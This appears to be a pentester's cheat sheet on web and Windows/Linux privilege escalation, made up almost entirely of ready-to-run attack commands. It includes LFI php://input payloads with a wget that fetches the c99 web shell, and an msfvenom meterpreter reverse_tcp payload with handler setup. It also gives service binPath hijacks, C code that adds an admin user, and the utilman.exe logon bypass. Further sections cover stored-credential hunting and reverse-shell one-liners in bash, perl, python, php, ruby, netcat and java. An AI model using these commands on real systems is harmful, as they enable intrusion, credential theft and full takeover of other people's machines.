Privilege Escalation - Web

LFI EXPLOITATION to shell :
how to shell a website using "php://input" method via LFI

Target : http://www.site.com/index.php?page=

check url : http://www.site.com/index.php?page=/etc/passwd
add null byte to url :

http://www.site.com/index.php?page=/proc/self/environ%00
http://www.site.com/index.php?page=/proc/self/fd%00
http://www.site.com/index.php?page=/etc/passwd%00

by using hacking bar or burp suite :

url : http://www.site.com/index.php?page=php://input
post : <? system('uname -a'); ?>
POST :  <? system('ls'); ?>
POST : <? system('id'); ?>
POST : <? system('mv file.txt file.php'); ?>
USING WGET : <? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>


<FORM ENCTYPE="multipart/form-data" ACTION=<?php echo "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; ?> METHOD=POST>Send this file: <INPUT NAME="userfile" TYPE="file"><INPUT TYPE="submit" VALUE="Send"></FORM><?php move_uploaded_file($_FILES["userfile"]["tmp_name"], $_FILES["userfile"]["name"]); ?>


############### change python exploit to exe exploit MS11-080 #####################
install PyWin32
PyInstaller

# python pyinstaller.py --onefile ms11-080.py


########################## Incorrect File and Service Permissions #############################
check all service :
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

then check permission :
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" >> result.txt
#  “BUILTIN\Users” have full access which will be designated as “(F)”
C:\Users\homer> cmd.exe /c icacls "C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BUILTIN\Users:(F)

after find vul service :
create exe payload :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe -e x86/shikata_ga_nai -a x86 --platform Windows > exploit.exe

# Next rename the original ose.exe to something different and name exploit.exe to ose.exe

msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost 192.168.134.135
lhost => 192.168.134.135
msf  exploit(handler) > set lport 4444
lport => 4444
msf  exploit(handler) > run

other ways create executable exe to add admin user :

# touch useradd.c

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators username /add");
return 0;
}

then compiler exploit :
# i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
replace the original ose.exe file with our own,

now restart service :
wmic service ose call startservice

read more :
https://www.toshellandback.com/2015/11/24/ms-priv-esc/
http://www.fuzzysecurity.com/tutorials/16.html
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
####################### Privilege Escalation Part 1 Weak Service File Permission Outline #####################################
1- download this file :
https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx

2- then Uploading Accesshk tool on the target

3- Determination of Permissions over a Service
Accesschk.exe –qwcu "Authenticated Users" *
Accesschk.exe –qwcu "offsec" *
Accesschk.exe –qwcu "Everyone" *
cacls "c:\Program Files" /T | findstr Users

after result write this command with change apache to application vulnerable:
# sc qa apache // sc qc <service name>
Modifying the “Path to executable” of a windows service
# sc config "Apache" binPath= "net localgroup administrators username /add"
or
sc config "Apache" binPath= "net user john hello /add && net localgroup Administrators john /add"
# sc stop "Apache"
# sc start "Apache"
# net stop Apache
# net start Apache
# net localgroup administrators

read more :
https://pentestlab.blog/2017/03/30/weak-service-permissions/


################# Windows Kernel Exploits #################

https://pentestlab.blog/category/privilege-escalation/page/2/


############### Abusing service misconfugration ############################
############### weak directory permssion  ############################
############### abusing scheduled tasks  ############################
############### crack hash user  ############################
############### system privlage using at or schtasks ############################
#################  Unquoted Service path Vulnerability ######################
################### edit service bainary ################################
################### check database unprivileged access to a database ,execute system commands through the database ###############

x86_64 ==> 64-bit kernel
i686   ==> 32-bit kernel


#################### Add service run ############################3
# at 13:01 /interactive cmd
# schtasks

@echo off
@break off title root
Cls
echo Creating service.
sc create evil binpath= "cmd.exe /K start" type= own type= interact &gt; nul 2&gt;&amp;1
echo Starting service.
sc start evil &gt; nul 2&gt;&amp;1
echo Standing by...
ping 127.0.0.1 -n 4 &gt; nul 2&gt;&amp;1
echo Removing service.
echo.
sc delete evil &gt; nul 2&gt;&amp;1

################# Stored Credentials ############################
Windows Files :
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml
check :
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

by command :
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini

Elevating privileges by exploiting weak folder permissions
https://www.greyhathacker.net/?p=738

Unattended Installs
# %WINDIR%\Panther\Unattend\
# %WINDIR%\Panther\
# use auxiliary/scanner/dcerpc/windows_deployment _services

AlwaysInstallElevated :
# reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# HKLM\SOFTWARE\Policies\Microsoft\Windows \Installer\AlwaysInstallElevated
# HKCU\SOFTWARE\Policies\Microsoft\Window s\Installer\AlwaysInstallElevated
This indicates that any MSI-file in the system has to be installed along with elevated privileges (NT AUTHORITY\SYSTEM)
The Metasploit contains a special module
# use exploit/windows/local/always_install_elevated
creates the MSI-files

Lost auto launch :
download to target machine :
https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx
# autorunsc.exe -a | findstr /n /R "File\ not\ found"
After, as you have probably guessed we need to exchange the ‘missing guy’ with our own one.


############################ Privilege Escalation Bypass Windows Logons with the Utilman.exe ################
# change file utilman.exe to cmd.exe
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe
# Once the computer boots up normally, press the key combination Windows Key + U and you should get a Command Prompt.
then check username available :
# net user
# net user xp10 xp10@1234
# net user NewGuy abc123 /add
# net localgroup Administrators NewGuy /add


################### linux ###################################
# identify OS & Kernal version
uname -a
cat /etc/lsb-release
cat /etc/redhat-release

# check application in server :
curl/wget
ftp
netcat
scp/sftp
smb
tftp

to hid exploit use .
/tmp/.nothing/exploit.c

enumeration tools to build exploit :
gcc
perl
python

# check config files

#check script run by init or cron

#command or script use by admin

# check linux PATH
printenv


# check file permission Readable/Writeable
find / -perm -2 ! -type l -ls
find /etc/corn.* -perm -2 ! -type l -ls

find / -type f -perm -4000 -ls > tmp.txt //find suid files
find / -type f -perm -4000 -ls | grep "flag00" > tmp.txt

find file rwxrwxrwx :

# check file
find / -xdev \( -perm -777 \) -type f -print0 -exec ls -l {} \;
find / -xdev \( -perm -4000 \) -type f -print0 -exec ls -l {} \;

after find anyfile 777 add Reverse Shell

Reverse Shell :
Bash :
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat:
nc -e /bin/sh 10.0.0.1 1234

Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Articles :

https://www.toshellandback.com/2015/11/24/ms-priv-esc/
https://github.com/AlessandroZ/BeRoot
https://attack.mitre.org/wiki/Privilege_Escalation